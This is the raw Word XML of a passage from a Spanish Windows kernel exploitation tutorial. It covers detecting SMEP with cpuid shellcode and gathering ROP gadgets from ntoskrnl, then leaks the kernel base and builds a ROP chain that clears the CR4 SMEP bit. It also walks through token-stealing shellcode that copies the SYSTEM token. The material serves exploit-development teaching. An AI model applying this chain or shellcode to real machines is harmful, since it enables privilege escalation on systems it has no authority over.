        <w:t xml:space="preserve"> habilitado.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Hay alguna forma sin debuggear kernel o sea desde un </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>programa</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en user saber si SMEP </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>está</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> habilitado</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>?</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="00C34BCE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRPr="006F027A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18"/>
          <w:szCs w:val="18"/>
          <w:lang w:val="es-AR"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/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proofErr w:type="gramEnd"/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=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\x33\xC9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\x33\xC0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\x33\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/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xdb</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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\xb8\x07\x00\x00\x00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 xml:space="preserve">"     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# "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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mov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> eax,7"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\x0f\xa2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 xml:space="preserve">"                 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# "cpuid"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\x8b\xc3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 xml:space="preserve">"                 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# "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart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mov</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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 xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart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eax,ebx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd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\xc3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 xml:space="preserve">"                     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# "ret"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Ejecutando ese </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>código</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en un programa en user mode me devuelve en EAX diferente valor si hay SMEP habilitado o no</w:t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Ahí</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve"> puse a mano los registros a cero en vez de los XOR y </w:t>
      </w:r>
      <w:r>
        <w:t>escribí</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve"> las dos instrucciones necesarias a ver que devuelve en EBX en la </w:t>
      </w:r>
      <w:r>
        <w:t>máquina</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve"> que no tiene SMEP habilitado.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8595" cy="782955"/>
            <wp:effectExtent l="0" t="0" r="8255" b="17145"/>
            <wp:docPr id="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EBX devuelve 2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Preparo para hacer la prueba en otra </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>maquina</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006F027A">
        <w:t>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1135" cy="1107440"/>
            <wp:effectExtent l="0" t="0" r="5715" b="1651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Vemos que EBX devuelve un valor muy diferente 0x001C2FBB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4785" cy="1106170"/>
            <wp:effectExtent l="0" t="0" r="12065" b="1778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Haciendo AND de este resultado con 0x80</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="00C34BCE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRPr="006F027A" w:rsidRDefault="002D26CF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006F027A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hex(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006F027A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x80 &amp; 0x001C2FBB)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRPr="006F027A" w:rsidRDefault="002D26CF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F027A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>'0x80'</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRPr="006F027A" w:rsidRDefault="002D26CF">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="006F027A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>hex(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="006F027A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0x80 &amp; 0x002)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="002D26CF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>'0x0'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Vemos que si el resultado da cero no hay SMEP y si da diferente de cero hay SMEP.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Se puede hacer esta pruebita desde </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>Python</w:t>
      </w:r>
      <w:r>
        <w:t>? Veamos.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Usando este </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>módulo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> cpuid</w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="00C34BCE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="002D26CF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:hyperlink r:id="rId26" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://github.com/flababah/cpuid.py</w:t>
        </w:r>
      </w:hyperlink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</w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>poniéndolo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en la misma carpeta del script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3040" cy="1334770"/>
            <wp:effectExtent l="0" t="0" r="3810" b="17780"/>
            <wp:docPr id="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Me </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>dará</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> el valor de los registros el segundo es EBX que vale 2 en la maquina sin SMEP.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73675" cy="1403350"/>
            <wp:effectExtent l="0" t="0" r="3175" b="6350"/>
            <wp:docPr id="2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027A" w:rsidRDefault="006F027A">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="002D26CF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Me devuelve el valor en decimal que </w:t>
      </w:r>
      <w:r w:rsidR="006F027A">
        <w:t>había</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> obtenido antes.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342765" cy="2105025"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:docPr id="59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Así</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve"> que lo puedo agregar al inicio</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> de mi script,</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve"> para que detecte si tiene o no SMEP, ya que si no tiene no solo no es necesario ropear y se puede saltar directo al shellcode, sino que el rop que haremos que toca el flag de cr4, es mejor no tocarlo</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> si no es necesario</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve">, aunque </w:t>
      </w:r>
      <w:r>
        <w:t>está</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve"> a cero y quedara a cero, pero como el rop es personalizado conviene que si detecta que no hay smep salte directo al shellcode sin rop</w:t>
      </w:r>
      <w:r>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve"> lo cual lo </w:t>
      </w:r>
      <w:r>
        <w:t>hará</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve"> mas general para los casos sin SMEP.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Bueno ya tenemos casi todo, nos falta el rop, shellcode y leakear la base de nt para poder ropear allí.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Ustedes dirán como obtengo los gadgets en kernel, con mona no se puede y el idasploiter no devuelve resultados aún en kernel, por lo cual no nos sirve.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="00C34BCE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="002D26CF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:hyperlink r:id="rId30" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://drive.google.com/open?id=1VbN3kipWQe9ti7WGheGSmbG9xOn4uaQW</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="00C34BCE">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="002D26CF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Allí hay una tool para buscar gadgets en forma estática, sea un módulo de kernel o lo que sea, le pasas el nombre y cuanto es el máximo largo de los gadgets y te busca todo conviene guardarlo en un archivo de texto para poder luego buscar con comodidad.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2405" cy="1256665"/>
            <wp:effectExtent l="0" t="0" r="4445" b="635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proofErr w:type="gramStart"/>
      <w:r>
        <w:t>rp-win-x86.exe</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> -f ntoskrnl.exe -r 5 &gt; pepe.txt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Bueno con eso nos guardara todos los gadgets en un archivo de texto llamado pepe.txt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73675" cy="2419350"/>
            <wp:effectExtent l="0" t="0" r="3175" b="0"/>
            <wp:docPr id="2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Es un archivo grandísimo, pero es una gran tool que sirve y encuentra gadgets en cualquier modulo.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Para leakear la base de nt usamos EnumDeviceDrivers, que devuelve una lista con los nombres y las bases de todos los drivers, generalmente nt es el primero sino podemos comparar el nombre en un loop hasta encontrar el que queremos y hallar la base de ese, veo que si lo ejecuto luego de importar los módulos faltantes, funciona e imprime la base de nt.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695190" cy="2980690"/>
            <wp:effectExtent l="0" t="0" r="10160" b="10160"/>
            <wp:docPr id="2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  <w:rPr>
          <w:color w:val="auto"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">En resumidas cuentas yo halle estos gadgets que me servirían para leer cr4 poner ecx a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="0000FF"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve">0xFFEFFFFF </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="auto"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>para luego hacer and ecx con eax y poner a cero el bit 20 y luego guardarlo de nuevo en cr4, ese sería un buen rop.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="00C34BCE">
      <w:pPr>
        <w:jc w:val="both"/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0x11fc10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 eax, cr4 -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0x75757575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junk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0x76767676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junk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0x51976f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pop ecx;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0xFFEFFFFF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to disable smep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0x50095c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and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eax,ecx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;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0x22f2da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 cr4,eax; ret4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</w:p>
    <w:p w:rsidR="00C34BCE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</w:pPr>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="002D26CF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>El problema es que no lo puedo poner debajo del return address así nomás, porque allí debajo de r está el puntero al source que va leyendo y si lo piso puede crashear hay que hacerlo bien.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00015" cy="3209290"/>
            <wp:effectExtent l="0" t="0" r="635" b="10160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Veo que pasándome un solo dword del return address piso el puntero a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>UserBuffer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> que es el source, así que no esta tan fácil poner el rop allí debajo.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="00C34BCE">
      <w:pPr>
        <w:jc w:val="both"/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data=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shellcode+ ((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 xml:space="preserve">0x828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-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
          <w:color w:val="000080"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>len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(shellcode)) * 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"A"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#shellcode</w:t>
      </w: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</w:pPr>
      <w:proofErr w:type="gramStart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ata</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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+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0x51976f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#return (pop ecx-ret) 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ata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+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struct.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="DF431C"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow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highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>"&lt;L"</w:t>
      </w:r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,</w:t>
      </w:r>
      <w:proofErr w:type="spell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highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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(buf)+</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>0x82c</w:t>
      </w:r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)</w:t>
      </w:r>
      <w:r w:rsidRPr="006F027A"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 xml:space="preserve">      </w:t>
      </w:r>
      <w:r w:rsidRPr="006F027A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
        </w:rPr>
        <w:t xml:space="preserve"># </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F027A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
        </w:rPr>
        <w:t>puntero</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="006F027A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
        </w:rPr>
        <w:t xml:space="preserve"> a source que </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="006F027A">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:cs="Courier New" w:hint="default"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="yellow"/>
          <w:shd w:val="clear" w:color="FFFFFF" w:fill="D9D9D9"/>
        </w:rPr>
        <w:t>piso</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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proofErr w:type="gramStart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ata</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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+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= input 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# rop</w:t>
      </w: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proofErr w:type="gramStart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ata</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd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+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=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"&lt;L"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 xml:space="preserve">0x0BAD0B0B0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# fin</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRPr="006F027A" w:rsidRDefault="00C34BCE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRPr="006F027A" w:rsidRDefault="00C34BCE">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="002D26CF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Una posibilidad sería pisar ese puntero, con un puntero al mismo shellcode más adelante, en este caso hago que el source cuando lo pisa empiece a apuntar al inicio de mi shellcode más 0x82c que es donde está el rop, así sigue copiando el mismo allí debajo y no se rompe, también piso el return address con un pop ecx-ret para que cuando salte a ejecutar saltee ese puntero al source y vaya justo al rop que quedara debajo.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Puedo reacomodar el rop para que me queden varios rets al inicio para compensar que viene de un ret8 a ejecutar, y quitar los paddings intermedios.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="00C34BCE">
      <w:pPr>
        <w:jc w:val="both"/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nt + 0x519770) *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 xml:space="preserve">4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0x11fc10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 eax, cr4 -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0x51976f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pop ecx;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0xFFEFFFFF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to disable smep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0x50095c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and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eax,ecx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;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0x22f2da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 cr4,eax; ret4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80"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>int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(buf)) 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a shellcode</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34BCE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</w:pPr>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="002D26CF">
      <w:r>
        <w:t>Cuando lo ejecuto llego al ret</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34BCE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114300" distR="114300">
            <wp:extent cx="5267325" cy="2266315"/>
            <wp:effectExtent l="0" t="0" r="9525" b="635"/>
            <wp:docPr id="2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voy </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>traceando</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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809490" cy="1485900"/>
            <wp:effectExtent l="0" t="0" r="10160" b="0"/>
            <wp:docPr id="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Si no se ve el código apreto f7 y si no se ve creo un segmento allí haciendo click derecho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676015" cy="2057400"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="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018790" cy="3409315"/>
            <wp:effectExtent l="0" t="0" r="10160" b="635"/>
            <wp:docPr id="2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Una dirección baja de inicio del segmento, que abarque la zona donde estoy y un nombre cualquiera es suficiente vuelvo a apretar f7 y aparece el código.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723515" cy="1057275"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:docPr id="2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el rop salta acá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552190" cy="1504950"/>
            <wp:effectExtent l="0" t="0" r="10160" b="0"/>
            <wp:docPr id="3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Donde queda cr4 en eax, luego hay un pop ecx ret donde pongo 0xffefffff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4310" cy="948690"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="3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el and para poner a 0 el bit 20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2828290" cy="1095375"/>
            <wp:effectExtent l="0" t="0" r="10160" b="9525"/>
            <wp:docPr id="3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Y luego volver a guardar el valor modificado en cr4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133090" cy="1257300"/>
            <wp:effectExtent l="0" t="0" r="10160" b="0"/>
            <wp:docPr id="3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Recordemos que era 0x1406e9 y ahora 0x406e9 que tiene el bit 20 apagado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933065" cy="2219325"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:docPr id="3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26CF" w:rsidRDefault="002D26CF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="002D26CF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>bin</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>0x406e9)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="002D26CF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>'0b</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t>01000000011011101001'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queda saltar al shellcode es muy similar al de Windows 7 pero las estructuras cambian, veamos.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4076065" cy="3942715"/>
            <wp:effectExtent l="0" t="0" r="635" b="635"/>
            <wp:docPr id="3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>Lo primero que vamos ejecutando son los nops lo cual significa que SMEP quedo bien apagado, sino aquí crashearia la máquina y se reiniciaría.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782153" cy="3196742"/>
            <wp:effectExtent l="0" t="0" r="8890" b="3810"/>
            <wp:docPr id="3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5950" cy="31999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 Recordemos que fs</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>:124</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> es un puntero a la estructura ETHREAD, la explicación ya la hicimos en el de Windows 7, acá cambiara solo algún offset.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70500" cy="1695450"/>
            <wp:effectExtent l="0" t="0" r="635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En el windbg incluido en IDA podemos ver la estructura para Windows 10.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799965" cy="4771390"/>
            <wp:effectExtent l="0" t="0" r="635" b="10160"/>
            <wp:docPr id="3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477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Como en el primer campo esta KTHREAD y esta ocupa 0x350, los campos que estamos trabajando están dentro de ella.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Vemos que acá a diferencia de Windows 7, que ApcState que es del tipo _KAPC_STATE, estaba en el offset 0x50, acá está en el offset 0x70.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565525" cy="2673985"/>
            <wp:effectExtent l="0" t="0" r="15875" b="12065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En el offset 0x10 de esa estructura esta</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="002D26CF" w:rsidRDefault="002D26CF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0500" cy="1286510"/>
            <wp:effectExtent l="0" t="0" r="6350" b="8890"/>
            <wp:docPr id="4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971290" cy="1285875"/>
            <wp:effectExtent l="0" t="0" r="10160" b="9525"/>
            <wp:docPr id="4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Pasa a EAX vemos que es el famoso numerito EPROCESS del proceso actual en ECX.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006547" cy="2532471"/>
            <wp:effectExtent l="0" t="0" r="3810" b="1270"/>
            <wp:docPr id="4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9796" cy="25352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Vemos que Pcb que es del tipo _KPROCESS está en el offset 0, así que coinciden en dirección con _EPROCESS, el tema es que acá busca el offset 0xfc y obvio no está dentro de KPROCESS porque su largo es 0xb0, así que está en EPROCESS más abajo.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171315" cy="2961640"/>
            <wp:effectExtent l="0" t="0" r="635" b="10160"/>
            <wp:docPr id="4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Así que lee el Token del proceso actual del offset 0xfc y lo deja en EBX.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104640" cy="1562100"/>
            <wp:effectExtent l="0" t="0" r="10160" b="0"/>
            <wp:docPr id="4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de 0xb8 lee </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ActiveProcessLinks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/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942715" cy="1666875"/>
            <wp:effectExtent l="0" t="0" r="635" b="9525"/>
            <wp:docPr id="4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ya lo habíamos explicado en la versión de Windows 7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73040" cy="2001520"/>
            <wp:effectExtent l="0" t="0" r="3810" b="17780"/>
            <wp:docPr id="4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Es el FLINK o sea que apunta al </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ActiveProcessLink</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> del proceso siguiente, como eso está en 0xb8 le resta esa constante para hallar el EPROCESS del proceso siguiente.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161790" cy="1457325"/>
            <wp:effectExtent l="0" t="0" r="10160" b="9525"/>
            <wp:docPr id="4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Luego va comparando el </w:t>
      </w:r>
      <w:r w:rsidR="008B5B9C">
        <w:t xml:space="preserve">contenido del </w:t>
      </w:r>
      <w:r>
        <w:t>offset 0xb4 que es el PID, hasta que encuentra el</w:t>
      </w:r>
      <w:r w:rsidR="008B5B9C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>proceso de PID 4 o sea SYSTEM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228465" cy="1924050"/>
            <wp:effectExtent l="0" t="0" r="635" b="0"/>
            <wp:docPr id="4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8B5B9C" w:rsidRDefault="002D26CF">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Una vez que sale del LOOP porque </w:t>
      </w:r>
      <w:r w:rsidR="008B5B9C">
        <w:t>encontró</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> SYSTEM y en EAX queda el EPROCESS del mismo, lee el Token del offset 0xfc y lo copia al proceso actual cuyo EPROCESS </w:t>
      </w:r>
      <w:r w:rsidR="008B5B9C">
        <w:t>había quedado en ECX</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008B5B9C" w:rsidRDefault="008B5B9C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C34BCE" w:rsidRDefault="008B5B9C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve">uego queda volver correctamente al proceso sin que crashee lo cual no es </w:t>
      </w:r>
      <w:r>
        <w:t>fácil</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve">, lo del Token ya </w:t>
      </w:r>
      <w:r>
        <w:t>está</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve"> listo.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Una de las </w:t>
      </w:r>
      <w:r w:rsidR="008B5B9C">
        <w:t>técnicas</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> es tracear el programa cuando pasa por la misma </w:t>
      </w:r>
      <w:r w:rsidR="008B5B9C">
        <w:t>función</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> pero sin overflow y seguir cuando vuelve de cada </w:t>
      </w:r>
      <w:r w:rsidR="008B5B9C">
        <w:t>función e ir mirando el stack, tratando de ver que cuando hay overflow vuelva en forma similar.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6118860" cy="2388870"/>
            <wp:effectExtent l="0" t="0" r="15240" b="11430"/>
            <wp:docPr id="5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Como </w:t>
      </w:r>
      <w:r w:rsidR="008B5B9C">
        <w:t>aquí</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> yo vuelvo </w:t>
      </w:r>
      <w:r w:rsidR="008B5B9C">
        <w:t xml:space="preserve">sin overflow </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">y llego </w:t>
      </w:r>
      <w:r w:rsidR="008B5B9C">
        <w:t>ahí</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> hay un retn8 y el stack </w:t>
      </w:r>
      <w:r w:rsidR="008B5B9C">
        <w:t>está</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> en esa </w:t>
      </w:r>
      <w:r w:rsidR="008B5B9C">
        <w:t>posición</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> por lo cual </w:t>
      </w:r>
      <w:r w:rsidR="008B5B9C">
        <w:t>volverá</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> a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505075" cy="923925"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="5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4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8B5B9C">
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:t>Así</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve"> que trato de volver al mismo lugar y que el stack este en la misma </w:t>
      </w:r>
      <w:r>
        <w:t>posición cuando hay overflow</w:t>
      </w:r>
      <w:r w:rsidR="002D26CF">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>y tengo que considerar el retn8.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Ven que cuando entro a ejecutar mi shellcode el stack </w:t>
      </w:r>
      <w:r w:rsidR="008B5B9C">
        <w:t>está</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> bastante parecido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6068695" cy="2241550"/>
            <wp:effectExtent l="0" t="0" r="8255" b="6350"/>
